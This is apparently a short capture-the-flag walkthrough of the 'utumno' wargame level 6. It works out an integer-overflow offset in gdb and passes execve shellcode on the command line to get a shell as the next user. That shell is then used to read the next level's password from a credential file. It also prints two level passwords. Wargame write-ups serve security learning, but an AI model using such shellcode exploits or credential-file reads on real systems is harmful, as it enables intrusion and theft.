utumno - 6

root@today:~/Desktop/misc/utumno/utumno6# ssh [email protected]

[email protected]'s password: eiluquieth

utumno6@melinda:~$ mkdir /tmp/utu6

utumno6@melinda:~$ cd /tmp/utu6

utumno6@melinda:/tmp/utu6$ gdb -tui /utumno/utumno6


#fetch the address return by malloc. it's 0x0804a008

#2147483663 = 0x8000000f  0x8000000f * 4 = 0x8000000f << (2) = 0x0000003c
#[esp + 0x3c + 0x20] = eip

utumno6@melinda:/tmp/utu6$ /utumno/utumno6 2147483663 804a008 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"'`
Table position -2147483633 has value 134520840
Description: j
              X1�Vh//shh/bin��1ɉ�̀
$ whoami
utumno7
$ cat /etc/utumno_pass/utumno7
totiquegae
$ 


你可能感兴趣的:(utumno - 6)